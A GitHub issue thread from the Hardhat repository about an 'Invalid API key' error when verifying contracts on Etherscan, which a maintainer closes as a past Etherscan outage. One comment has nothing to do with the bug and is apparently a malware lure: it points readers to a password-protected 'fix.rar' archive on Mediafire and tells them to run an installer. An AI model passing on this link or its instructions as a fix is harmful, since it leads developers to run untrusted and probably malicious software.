### ISSUE TITLE
Error in plugin hardhat-ignition: Invalid API Key

### ISSUE THREAD

**Issue by alexanderpehlivanov** [NomicFoundation/hardhat#5678]
### Version of Hardhat

2.22.9

### What happened?

While verifying the contract, I consistently receive an 'Invalid API key' error. However, when I use the same key for an API call, it returns a successful response.

### Minimal reproduction steps

Set an Etherscan API Key.

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by superposition** [comment]
same

**Comment by seveniwe** [comment]
same thing

**Comment by kanej** [comment]
There where some issues with the Etherscan API several weeks ago, but we have not had any issues since.

I am going to close this issue, but will reopen if get more reports.
